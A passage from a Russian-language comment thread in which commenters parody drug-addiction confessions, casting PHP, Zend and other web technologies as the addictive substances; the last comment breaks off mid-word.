                          Я, не находя себе места в жизни, перешел на более мощные фреймворки и технологии - «PHP», «Zend», «HTML5», «node.js», «React»... Я стал никому не нужен...
                          Но в моей жизни осталось 3 друга, которые ценят меня (они не программисты и не пишут!). Но зависимость оказалась сильнее меня. Я начал воровать. Воровал сначала в репозиториях, копипастил модули и классы и т.п потом перешел на сишные либы, слава Богу пока не попадался...

                          И я не вижу смысла в жизни, но суицид не выход.

                          Уважаемые читатели, не спешите осуждать или упрекать меня. Вы не прошли через это, и вы не имеете право судить о том, правильно ли я поступил или нет. Да, может где-то мне не хватило силы воли или разума, или еще чего... Но для меня все уже закончено...
                          Ответить
                      • Меня подсадил на «PHP» мой любимый мужчина... Вначале просто баловалась «PHP», не часто раз - два в месяц. Потом его посадили, а где брать фреймворки я не знала, да и не тянуло, жизнь била ключом, учеба/работа/активный отдых... Все изменилось когда он освободился... Я тогда про «Zend» даже не слышала, а тут он нашел и хостинг, и верстальщика, и деньги были...

                        Вначале все было вроде нормально, покодили, выложили, пошли домой. Потом он начал нагонять темп, от ра